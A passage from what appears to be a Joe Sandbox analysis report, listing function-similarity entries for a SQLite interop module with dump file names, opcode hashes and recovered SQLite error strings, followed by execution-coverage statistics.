                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I353770fd94e573c1.
                                                                                                                                                                                                                                      • String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
                                                                                                                                                                                                                                      • API String ID: 1989827943-264706735
                                                                                                                                                                                                                                      • Opcode ID: 5838bea1fe329e40cabc2d7205d51c96663df886c259d40a3bfdd7708523f81e
                                                                                                                                                                                                                                      • Instruction ID: c515817f53c0136688f1c648f0dd45ded6ae2fa503a3a92078a825742a1c1396
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5838bea1fe329e40cabc2d7205d51c96663df886c259d40a3bfdd7708523f81e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C512471A293519FD7048F29C481B5AB7A0EBC5324F0546A9F8B48B386F738DB85C7A1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BC0656B
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 6BC06625
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_memset
                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                      • API String ID: 121741435-4108050209
                                                                                                                                                                                                                                      • Opcode ID: c7331f497d381d67ccb600d58e39c8a139b0aff61050bae7fa7755f7afd3b389
                                                                                                                                                                                                                                      • Instruction ID: 46708ede5264ce94f4bfe110855788f8f671bb16581b1ad8f3f4be9d7c31edb2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c7331f497d381d67ccb600d58e39c8a139b0aff61050bae7fa7755f7afd3b389
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 055138B0A11B04DFD718CF68C580A6AB7F5FB88304F1089ADE44ACB745EB79EA41CB50
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC1EBFD
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC1ECCF
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Iaa0f8e0c251cfd1d.
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 372259789-3916222277
                                                                                                                                                                                                                                      • Opcode ID: b9b5be579b356a45b591c4eb27929d654f7cb1870caf25351cad5cb2bdf03f46
                                                                                                                                                                                                                                      • Instruction ID: fa5f936012e9d36d3034724297e0944351077e994b5952593f5825b130a89e44
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b9b5be579b356a45b591c4eb27929d654f7cb1870caf25351cad5cb2bdf03f46
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 234128B6E296056BDB11CF69DC406AAFBB9DFC0214F1440E9E888D7301F7399B05D790
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _memset
                                                                                                                                                                                                                                      • String ID: H$too many FROM clause terms, max: %d
                                                                                                                                                                                                                                      • API String ID: 2102423945-1622072631
                                                                                                                                                                                                                                      • Opcode ID: f62485e647cc9852d5ed874c4db16961da909a0a6d4fc04e6f854f71aad14e17
                                                                                                                                                                                                                                      • Instruction ID: 1dc4eefd65532ea72ffbdb10ecc41af3c114a07de57bb63973954d93ad0be362
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f62485e647cc9852d5ed874c4db16961da909a0a6d4fc04e6f854f71aad14e17
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D541F473F021249FCB14CF68CC90B9973A6EB84325F4982BDD815DB384FA38AA158780
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • default value of column [%s] is not constant, xrefs: 6BC9358C
                                                                                                                                                                                                                                      • cannot use DEFAULT on a generated column, xrefs: 6BC935A8
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _memset
                                                                                                                                                                                                                                      • String ID: cannot use DEFAULT on a generated column$default value of column [%s] is not constant
                                                                                                                                                                                                                                      • API String ID: 2102423945-2211344978
                                                                                                                                                                                                                                      • Opcode ID: 6e6697a2532321a164e14621984ff30529c4298b53682d3b516af0b88f9210ab
                                                                                                                                                                                                                                      • Instruction ID: f82b6b8db6e02de7874d1ca44618c501a9d8c3443a50590bbf136fb0815e5318
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e6697a2532321a164e14621984ff30529c4298b53682d3b516af0b88f9210ab
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 454121705143409BD300DF28E881B9BB7A5AFC8708F04495CF9589B342E779EB59CBE6
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _memset
                                                                                                                                                                                                                                      • String ID: cannot use RETURNING in a trigger$sqlite_returning
                                                                                                                                                                                                                                      • API String ID: 2102423945-753984552
                                                                                                                                                                                                                                      • Opcode ID: 170429eab43a466a938597c7c9eef08ca1843d5f3ac79d210257c7e26016a8b9
                                                                                                                                                                                                                                      • Instruction ID: 9cfe00904a69d9bdb264087074f367f012f21d8d7b9b05fd698780155b353e56
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 170429eab43a466a938597c7c9eef08ca1843d5f3ac79d210257c7e26016a8b9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8241F670A10701ABE700CF68D882B4BB7B8BF44718F504569E9189B341F739E765CBA1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 6BC158E8
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000), ref: 6BC1595B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Iaa0f8e0c251cfd1d._memset
                                                                                                                                                                                                                                      • String ID: unicode61
                                                                                                                                                                                                                                      • API String ID: 1786038377-820661299
                                                                                                                                                                                                                                      • Opcode ID: 8128e24be55f86f98fb23470b84d0fd2503848f506a0f3c7ad440d0db9e1e405
                                                                                                                                                                                                                                      • Instruction ID: 9d984fe685a2e11bb1c5052b3846858ffff99fd6194c5baa9526c2bf1d374ef9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8128e24be55f86f98fb23470b84d0fd2503848f506a0f3c7ad440d0db9e1e405
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CE218E727252005BD700CE69DC41B9BB3D9EF84235F044169FE68DB240FA79EA1687A2
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI5b4aedd0c04bd151.SQLITE.INTEROP(?), ref: 6BC3FE4D
                                                                                                                                                                                                                                      • SI1bf8975e567ea97a.SQLITE.INTEROP(?), ref: 6BC3FEFB
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • second argument to nth_value must be a positive integer, xrefs: 6BC3FEBD
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I1bf8975e567ea97a.I5b4aedd0c04bd151.
                                                                                                                                                                                                                                      • String ID: second argument to nth_value must be a positive integer
                                                                                                                                                                                                                                      • API String ID: 4239521264-2620530100
                                                                                                                                                                                                                                      • Opcode ID: ed4c6131f707300c056bf17860c0dc186b7dc6c34cac45c9b20700e6a923a9ac
                                                                                                                                                                                                                                      • Instruction ID: 251f5e406bf9df839697ddb5689eb70e00661be52075c8c4bcda5d0dbff22fea
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ed4c6131f707300c056bf17860c0dc186b7dc6c34cac45c9b20700e6a923a9ac
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B315B72A2D6215FCB009F69D88174573A0BF42328F904EA9EC6887382F739DB05C7D1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SIffb8076c269e2a85.SQLITE.INTEROP ref: 6BC489FD
                                                                                                                                                                                                                                      • SI1bf8975e567ea97a.SQLITE.INTEROP(?), ref: 6BC48A54
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Invalid argument to rtreedepth(), xrefs: 6BC48A72
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I1bf8975e567ea97a.Iffb8076c269e2a85.
                                                                                                                                                                                                                                      • String ID: Invalid argument to rtreedepth()
                                                                                                                                                                                                                                      • API String ID: 4143718659-2843521569
                                                                                                                                                                                                                                      • Opcode ID: e210d6c7cb3337c69ab2435f98e7cdcabdcbdb06efcf4a65ddb494f1915926b0
                                                                                                                                                                                                                                      • Instruction ID: fa9275f2b689f6cc64951c5caccf9583e60a303802db13eaf0a43674ecd8cb66
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e210d6c7cb3337c69ab2435f98e7cdcabdcbdb06efcf4a65ddb494f1915926b0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 312139B2A152044BD710CF2DD841B6673A4EF86235F1403AAED6CCB281F72ADB56C3E1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SIdb45e174afb28e2c.SQLITE.INTEROP(%z%s"%w"."%w"."%w"="%w"."%w"."%w",00000000,6BD06F50,?,?,?,00000000,?,?,?,?,6BCE2180,?,?,?,?), ref: 6BCCB6F0
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Idb45e174afb28e2c.
                                                                                                                                                                                                                                      • String ID: AND $%z%s"%w"."%w"."%w"="%w"."%w"."%w"
                                                                                                                                                                                                                                      • API String ID: 778684903-433850526
                                                                                                                                                                                                                                      • Opcode ID: eaa7bb45d84f2d52de8799223729118ae719fd28fb0f6d08b86ad1971c695ead
                                                                                                                                                                                                                                      • Instruction ID: 77c63094fbc1712eb4f8ccd0145c27f5ec923c3d559a10a17b8d1e6c401925c0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eaa7bb45d84f2d52de8799223729118ae719fd28fb0f6d08b86ad1971c695ead
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 17F08CB15251596B9B148FA0EC41DAB3AAADB94354B10806DFC058A240FB38AD82C7B2
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SIdb45e174afb28e2c.SQLITE.INTEROP(unable to use function %s in the requested context,?), ref: 6BCCE5D7
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000,00000000,000000FF,000000FF,00000001,000000FF,unable to use function %s in the requested context,?), ref: 6BCCE5F6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • unable to use function %s in the requested context, xrefs: 6BCCE5D2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Iaa0f8e0c251cfd1d.Idb45e174afb28e2c.
                                                                                                                                                                                                                                      • String ID: unable to use function %s in the requested context
                                                                                                                                                                                                                                      • API String ID: 3537641774-47290733
                                                                                                                                                                                                                                      • Opcode ID: 933fad20cf2b9c9f3eea811db992edf7978413dfb63a1024b24b3c268df15669
                                                                                                                                                                                                                                      • Instruction ID: 213d828f9d251cbcc8907ac8cea79d8cdbcb32f7ca95f1dd53b70f312b0e9e44
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 933fad20cf2b9c9f3eea811db992edf7978413dfb63a1024b24b3c268df15669
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6CE092315285146BCB209B5CDC41EA6B3EC8B8A738F200315B878A73D0EEA5A94046A6
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _memset
                                                                                                                                                                                                                                      • String ID: out of memory
                                                                                                                                                                                                                                      • API String ID: 2102423945-2599737071
                                                                                                                                                                                                                                      • Opcode ID: 7341a1fb35f5da7fa8470aea686737c756178c929aea37ba71d34a8ed6d4e717
                                                                                                                                                                                                                                      • Instruction ID: e85011fafe2fe3a4c269911dda5bd911a7bbb6b0257c1c6e839a15b68311a881
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7341a1fb35f5da7fa8470aea686737c756178c929aea37ba71d34a8ed6d4e717
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1CE06DB0952B4066E214DB309C02F86B794AB60705F50852CE699062C1EBBC71588BD9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SIdb45e174afb28e2c.SQLITE.INTEROP(json_%s() needs an odd number of arguments), ref: 6BC3FA4E
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000,00000000,000000FF,000000FF,00000001,000000FF,json_%s() needs an odd number of arguments), ref: 6BC3FA6D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • json_%s() needs an odd number of arguments, xrefs: 6BC3FA49
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Iaa0f8e0c251cfd1d.Idb45e174afb28e2c.
                                                                                                                                                                                                                                      • String ID: json_%s() needs an odd number of arguments
                                                                                                                                                                                                                                      • API String ID: 3537641774-3040682063
                                                                                                                                                                                                                                      • Opcode ID: 25525ee5ceee28e66ad1008f17f56170918af367c0060aff60e0302338eeb7e1
                                                                                                                                                                                                                                      • Instruction ID: 4a783d22bc4289e84b23023b33ddaa7f9e33c916919a4b72ef4b032a1f97442d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 25525ee5ceee28e66ad1008f17f56170918af367c0060aff60e0302338eeb7e1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5BE01D7147953576DA10666C5C46EA6729C8B0623CF200351BC38A62D1FF952A5041FB

                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                      Execution Coverage:1.4%
                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                      Signature Coverage:3.3%
                                                                                                                                                                                                                                      Total number of Nodes:550
                                                                                                                                                                                                                                      Total number of Limit Nodes:15
